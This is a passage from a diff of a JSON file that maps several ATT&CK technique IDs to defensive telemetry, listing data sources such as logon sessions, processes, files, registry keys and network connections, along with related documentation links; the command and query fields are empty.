traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1556.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1556", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1056.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1552.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1021.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": 